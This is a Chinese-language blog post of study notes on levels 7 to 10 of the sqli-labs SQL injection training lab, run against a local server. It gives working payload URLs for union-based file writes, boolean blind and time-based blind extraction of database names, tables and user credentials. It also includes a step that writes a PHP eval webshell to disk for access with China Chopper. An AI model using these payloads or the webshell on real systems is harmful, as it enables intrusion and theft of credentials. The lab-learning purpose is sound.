sql注入——day02

2sqli_labs 7
1.直接用?id='判断是否有注入点,如果返回数据库错误则可以注入。
2.同样用之前的方法不断测试发现id被((''))包裹
3. http://127.0.0.1/sqli/Less-7/?id=1')) order by 3--+ 查看有多少列
4. http://127.0.0.1/sqli/Less-7/?id=-1')) union select 1,2,'<?php @eval($_POST[“crow”]);?>' into outfile "C:\\phpstudy\\PHPTutorial\\WWW\\sqli\\Less-7\\test.php" --+ 将一句话木马写入其中
5. 使用中国菜刀访问即可!

sqli_labs 8
第一种仍然使用老方法布尔盲注
1. http://127.0.0.1/sqli/Less-8/?id=1’ 判断此时存在注入漏洞
2.  http://127.0.0.1/sqli/Less-8/?id=1‘ order by 3--+   当3改为4的时候,you are in….消失,说明存在三列。
3. http://127.0.0.1/sqli/Less-8/?id=1' and left((select database()),1)=0x73 --+猜出来当前第一位是s
或者是使用: http://127.0.0.1/sqli/Less-8/?id=1‘ and ascii(substr((select database()),1,1)) > 16--+ 此时是有回显的。
4. http://127.0.0.1/sqli/Less-8/?id=1‘ and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >17 --+ 先通过大于号或者小于号来判断数据库的第一个字母是哪一个,
也可以使用http://127.0.0.1/sqli/Less-8/?id=1’ and ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1)) = 115--+ 此时可以验证数据库中第五个数据库的第一个字母是s
5. http://127.0.0.1/sqli/Less-8/?id=1‘ and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1),1,1)) >11 --+ 判断security数据库中的第4个表中的数据的第一位是否大于11, 
也可以使用 http://127.0.0.1/sqli/Less-8/?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1),1,1)) =117 --+ 
验证数据库中第4个表中的数据的第一位的第一个字母的ascii码是否是117,也就是 u
6. http://127.0.0.1/sqli/Less-8/?id=1‘ and  ascii(substr((select column_name from information_schema.columns where table_name = 0x7573657273 limit 1,1),1,1)) >10 --+ 
同理,进行判断表中的字段,然后进行判断。可以得到username,password;
7. http://127.0.0.1/sqli/Less-8/?id=1‘  and ascii(substr((select username from security.users limit 0,1),1,1)) >10 --+ 
同理,进行判断,最后再使用password进行判断。
8. 因为猜解速度较慢,可以配合burpsuite或者是sqlmap的脚本来使用。

第二种使用时间盲注
通过if结合sleep()函数,通过反应时间来快速判断
1. http://127.0.0.1/sqli/Less-8/?id=1‘ and sleep(5)--+ 使用延迟的方法判断是否存在注入漏洞。当然判断是否存在注入漏洞的方法很多。
2.  http://127.0.0.1/sqli/Less-8/?id=1‘ and if(length(database()) = 8,1,sleep(5))--+ 当为8的时候很快加载,而为其他值得时候加载较慢(5s左右),那就说明此时数据库的长度就是8(security)
3. http://127.0.0.1/sqli/Less-8/?id=1' and if(ascii(substr((select database()),1,1)) >113,1,sleep(5))--+如果当前数据库的第一个字母的ascii值大于113的时候,会立刻返回结果,否则执行5s。
4. http://127.0.0.1/sqli/Less-8/?id=1‘ and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1))>112,1,sleep(5))--+ 同理判断数据库中的第5个数据库的第一位的ascii的值是不是大于112(实际中是115),如果是的则速度返回,否则延时5s返回结果。
5. 其余步骤与法一基本类似,可以采用burpsuite或者是sql盲注脚本使用。

sqli_labs 9
第九关与第八关类似,因为只回显you are in所以只能用时间盲注来判断。
1. http://127.0.0.1/sqli/Less-9/?id=1‘  order by 3999--+ 当使用order by的时候,此时无论如何都是回显you are in….所以无法使用order by进行判断。
2. http://127.0.0.1/sqli/Less-9/?id=1‘ and sleep(5)--+ 当存在注入漏洞时,可以使用延迟注入进行判断,此时若存在漏洞,则睡眠5s之后再返回结果。
3. http://127.0.0.1/sqli/Less-9/?id=1‘ and if(length(database())=8,1,sleep(5)); 通过返回时间进行判断,此时如果数据库长度为8,则可以较快返回。
4. http://127.0.0.1/sqli/Less-9/?id=1‘ and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1))>1112,1,sleep(5))--+ 使用less-8中同样的方法进行判断即可!
5. 因为盲注属于猜解,推荐使用脚本进行操作。

sqli_labs 10
第十关与第九关一样,只是id值被""包裹

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值